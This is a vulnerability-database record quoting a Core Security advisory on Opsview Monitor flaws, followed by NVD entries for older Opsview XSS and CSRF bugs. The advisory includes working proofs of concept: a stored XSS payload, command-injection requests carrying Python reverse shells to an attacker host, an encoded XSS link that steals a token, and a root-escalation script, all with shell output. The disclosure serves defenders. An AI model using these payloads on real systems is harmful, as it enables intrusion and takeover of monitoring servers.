close\n\n[{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":2},{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"profile\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":3}]\n-----/\n\nThe input will be stored without any sanitization and rendered every\ntime the /settings section is visited by the user. It\u0027s important to\npoint that this XSS is self stored and it\u0027s executed only in the context\nof the victim\u0027s session. However, this vulnerability can be exploited by\nan attacker to gain persistency and execute the malicious code each time\nthe victim accesses to the settings section. 
\nExcerpt of the source code showing the injected script tag:\n\n/-----\n[{\"property\":\"name\",\"root\":\"data\",\"direction\":\"ASC\"}]}},\"contact\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"name\",\"root\":\"data\"}]}},\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"pageSize\":50,\"filters\":[],\"page\":1}},\"hostcheckcommand\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"priority\",\"root\":\"data\"}]}},\"netflow_collector\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"page\":1,\"filters\":[],\"pageSize\":50}},\"\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"\n-----/\n\n7.3. \n \nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/notificationmethod/testnotification?_dc=1520444703477\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)\nGecko/20100101 Firefox/58.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 376\nCookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;\nopsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;\nauth_tkt=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%3D%3D\nConnection: close\n\n{\"message\":\"Test\nMessage\",\"command\":\"submit_xmpp_script\",\"variables\":[],\"test_variables\":[{\"name\":\"PAGER\",\"value\":\"123123123\n|| python -c 
\u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\u003cattackerIP\u003e\\\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);\u0027\"}],\"id\":\"20\"}\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nAdditionally, it is possible to combine this issue with a redirection\nfunctionality within the management console and the vulnerability\ndescribed in 7.1 (Reflected Cross-Site Scripting), to build a specially\ncrafted link that could be sent to an administrator to trigger a reverse\nshell. \n\nIn order to perform the attack, consider the following:\n\n. API\u0027s sensitive actions require a \u0027restToken\u0027 to be processed. This\ntoken could be obtained by a Cross-Site Scripting attack from a specific\nendpoint (/settings). Abuse the login page redirection functionality to force the user to\naccess the Cross-Site Scripting vulnerable URL described in 7.1 (you may\nalso abuse the Cross-Site scripting vulnerability reported in\nhttps://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). \nIf the user is already authenticated he will be automatically redirected. \nOtherwise, the login page will appear and the redirection will take\nplace after a successful login. 
\n\nThe following proof of concept presents a crafted link that could\ntrigger a reverse shell if accessed by an administrator:\n\n/-----\nhttps://\u003cserverIP\u003e/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%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%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1\n-----/\n\nOnce clicked, the authenticated administrator will be redirected to the\nvulnerable section where his browser will perform a request to the\n\u0027/settings\u0027 endpoint in order to obtain a valid \u0027restToken\u0027. Finally,\nusing that token, the API request to\n\u0027rest/config/notificationmethod/testnotification\u0027 will be exploited thus\nresulting in a reverse shell. \n\n7.4. **Rancid test connection functionality abuse leading to command\nexecution**\n\n[CVE-2018-16144] NetAudit is a section within Network Analyzer that\nallows the user to automate the backing up of network devices\u0027\nconfiguration files to a centralized location. The test connection\nfunctionality is vulnerable to command injection due to an improper\nsanitization of the \u0027rancid_password\u0027 parameter. 
\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: b3d716e0157fd6337e6978220188051d8c578850\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 434\nCookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;\nauth_tkt=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%3D%3D\nConnection: close\n\nip=\u003cattackerIP\u003e++++++\u0026rancid_vendor=1\u0026rancid_username=234234+add+password+xxxxx\u0026rancid_connection_type=telnet\u0026rancid_autoenable=1\u0026rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+\u0027import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"\u003cattackerIP\u003e\",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\u0027`\u0026host_id=2\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n$ uname -a\nLinux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34\nUTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n-----/\n\n7.5. **Script modification could allow local privilege escalation**\n\n[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios\nprivileges and the scripts that run at boot time, impersonate nagios\nuser during its execution. 
However, the\n\u0027/etc/init.d/opsview-reporting-module\u0027 script invokes the\n\u0027/opt/opsview/jasper/bin/db_jasper\u0027 script before dropping root\nprivileges. \n \nThe following excerpt shows the vulnerable code:\n \n/-----\n/etc/init.d/opsview-reporting-module:\n\n/opt/opsview/jasper/bin/db_jasper db_exists 2\u003e /dev/null\nif [ $? != 0 ]; then\n echo \"Attempted to start jasperserver but MySQL credentials are wrong.\"\n exit 0\nfi\n\nDAEMON=/opt/opsview/jasper/bin/rc.jasperserver\n\ntest -x $DAEMON || exit 0\n\n# Switch to opsview user if run as root\nid | grep \"uid=0(\" \u003e/dev/null\nif [ $? = 0 ] ; then\n su - opsview -c \"$DAEMON $@\"\nelse\n exec $DAEMON $@\nfi\n-----/\n\nThe file \u0027/opt/opsview/jasper/bin/db_jasper\u0027, which is invoked by the\nvulnerable script, can be edited by the nagios user which belongs to the\n\u0027opsview\u0027 group. \n \n/-----\nls -ltr /opt/opsview/jasper/bin/db_jasper\n-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017\n/opt/opsview/jasper/bin/db_jasper\nnagios@image-builder-299:/home/admin$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nSince \u0027db_jasper\u0027 receives \u0027db_exists\u0027 as an argument, which is later\nused in a case statement, an attacker could edit that specific part of\nthe script in order to execute arbitrary code once the appliance is\nrebooted. 
\n\nThe following excerpt shows the attacker\u0027s bash script which, after\nexecution, will trigger a reverse shell with root privileges:\n\n/-----\nwhile [ \"x$1\" != \"x\" ] ; do\n case \"$1\" in\n db_export)\n db_export\n ;;\n db_export_test)\n db_export_test\n ;;\n db_export_initial)\n TEST=1\n db_backup\n ;;\n db_import)\n db_import\n ;;\n db_install)\n db_install\n ;;\n db_backup)\n db_backup\n ;;\n db_restore)\n db_restore\n ;;\n db_exists)\n python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattackerIP\u003e\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\u0027 \u0026\n db_exists\n exit $?\n ;;\n db_upgrade)\n db_upgrade\n exit $?\n ;;\n *)\n die \"Usage: $0\n{db_export|db_import|db_install|db_backup|db_restore}\"\n ;;\n\n esac\n shift\ndone\n-----/\n\n/-----\n$nc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 45566)\n# id\nuid=0(root) gid=0(root) groups=0(root)\n-----/\n\n8. **Report Timeline**\n\n2018-05-03: Core Security sent an initial notification to Opsview,\nasking for GPG keys in order to send draft advisory. \n2018-05-04: Opsview replied attaching its GPG keys. \n2018-05-04: Core Security sent the encrypted draft advisory. \n2018-05-04: Opsview confirmed the reception of the advisory and informed\nan initial response would be ready by May 11th. \n2018-05-11: Opsview replied saying they were able to reproduce all of\nthe reported vulnerabilities and confirmed that they were present in all\nsupported versions of Opsview Monitor (5.4, 5.3 and 5.2). \nIn addition, Opsview informed that were planning to release a fix for\nthese versions by the end of July. \n2018-05-11: Core Security thanked the confirmation. 
\n2018-06-25: Opsview informed that they were planning to release a major\nupdate for the product (6.0) at the end of July. This update will\naddress all reported vulnerabilities. Also, they informed that the\nprevious versions of the product would be fixed by the end of August. \n2018-06-27: Core Security thanked the status update and asked for a\ntentative public disclosure date. \n2018-07-16: Core Security requested a status update. \n2018-07-18: Opsview proposed to set a tentative publication date by the\nend of August when they release the fixes for its earlier versions. \n2018-07-18: Core Security agreed with the Opsview\u0027s proposal. \n2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0\nrelease will be available on July 25th. In addition, they\ninformed that they didn\u0027t have the exact release date for the updates to\nprevious versions of the product. \n2018-08-06: Core Security requested a status update for the remaining\nfixes. \n2018-08-13: Opsview replied saying that they were targeting the week of\nAugust 24th for release the fixes of their earlier product versions and\nthey would confirm the exact date at the end of the next week. \n2018-08-13: Core Security thanked the reply. \n2018-08-24: Opsview informed Core Security that the remaining fixed\nversions will be available on August 29th. \n2018-08-24: Core Security thanked the update and proposed September 4th\nas the coordinated release date. \n2018-08-28: Opsview agreed on the proposed release date. \n2018-09-04: Advisory CORE-2018-0008 published. \n\n9. **References**\n\n[1] https://www.opsview.com/solutions\n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. 
Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. \n\n11. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. **Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-16146",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-17453",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-16146",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149236",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"id": "VAR-201809-0904",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
}
]
},
"last_update_date": "2023-12-18T12:01:17.777000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "5.4.2 Released: 04th September 2018",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"title": "OpsviewMonitor command to execute the patch for the vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/139521"
},
{
"title": "Opsview Monitor Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84507"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://seclists.org/fulldisclosure/2018/sep/3"
},
{
"trust": 1.8,
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16146"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16146"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/settings/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16148"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16144"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"trust": 0.1,
"url": "https://www.cvedetails.com/cve/cve-2016-2511/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16145"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16147"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/login?back=%2frest%2fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmfyihhocia9ig5ldybytuxidhrwumvxdwvzdcgpo3hoci5vbnjlywr5c3rhdgvjagfuz2ugpsbmdw5jdglvbigpihtpziaoeghylnjlywr5u3rhdgugpt0gwe1mshr0cfjlcxvlc3qure9orsl7cmvnzxhwid0glyg%2fonjlc3rub2tlbii6iikolio%2fksg%2foiiplzt0b2tlbia9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3jlz2v4cca9ic8opzp1c2vytmftzsi6iikolio%2fksg%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%2bxcismtywmdapkttvcy5kdxaykhmuzmlszw5vkcksmck7ig9zlmr1cdiocy5mawxlbm8okswxktsgb3muzhvwmihzlmzpbgvubygpldipo3a9c3vichjvy2vzcy5jywxskftcii9iaw4vc2hciixcii1pxcjdktsnin1dlcjpzci6ijeiftt4ahiylnnlbmqoslnpti5zdhjpbmdpznkoym9keskpo2fszxj0khrva2vuktthbgvydch1c2vybmftzsk7fx07eghylm9wzw4oj1bpu1qnlcanl3nldhrpbmdzlycsihrydwupo3hoci5zzw5kkg51bgwpow%3d%3d%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://www.opsview.com/solutions"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"date": "2018-09-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"date": "2018-09-05T17:57:27",
"db": "PACKETSTORM",
"id": "149236"
},
{
"date": "2018-09-05T21:29:02.797000",
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"date": "2018-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Opsview Monitor Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
],
"trust": 0.6
}
}
FKIE_CVE-2013-3936
Vulnerability from fkie_nvd - Published: 2020-01-02 15:15 - Updated: 2024-11-21 01:54

| Vendor | Product | Version | |
|---|---|---|---|
| opsview | opsview | * | |
| opsview | opsview_core | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5394676A-D216-4650-80AF-ED7F1543AB0F",
"versionEndExcluding": "4.4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview_core:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D21F51C8-99B8-491C-8F22-CBD005968DA9",
"versionEndExcluding": "20130522",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Opsview before 4.4.1 and Opsview Core before 20130522 allow remote attackers to inject arbitrary web script or HTML."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de tipo cross-site scripting (XSS) en Opsview versiones anteriores a la versi\u00f3n 4.4.1 y Opsview Core versiones anteriores a la versi\u00f3n 20130522, permiten a atacantes remotos inyectar script web o HTML arbitrario."
}
],
"id": "CVE-2013-3936",
"lastModified": "2024-11-21T01:54:34.350",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-01-02T15:15:11.490",
"references": [
{
"source": "PSIRT-CNA@flexerasoftware.com",
"tags": [
"Vendor Advisory"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
},
{
"source": "PSIRT-CNA@flexerasoftware.com",
"tags": [
"Broken Link",
"Vendor Advisory"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"Vendor Advisory"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
}
],
"sourceIdentifier": "PSIRT-CNA@flexerasoftware.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2013-3935
Vulnerability from fkie_nvd - Published: 2020-01-02 15:15 - Updated: 2024-11-21 01:54

| Vendor | Product | Version | |
|---|---|---|---|
| opsview | opsview | * | |
| opsview | opsview_core | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5394676A-D216-4650-80AF-ED7F1543AB0F",
"versionEndExcluding": "4.4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview_core:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D21F51C8-99B8-491C-8F22-CBD005968DA9",
"versionEndExcluding": "20130522",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4.1 and Opsview Core before 20130522 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via unspecified vectors."
},
{
"lang": "es",
"value": "Una vulnerabilidad de tipo cross-site request forgery (CSRF) en Opsview versiones anteriores a la versi\u00f3n 4.4.1 y Opsview Core versiones anteriores a la versi\u00f3n 20130522, permite a atacantes remotos secuestrar la autenticaci\u00f3n de administradores para peticiones que cambian la contrase\u00f1a de administrador por medio de vectores no especificados."
}
],
"id": "CVE-2013-3935",
"lastModified": "2024-11-21T01:54:34.237",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
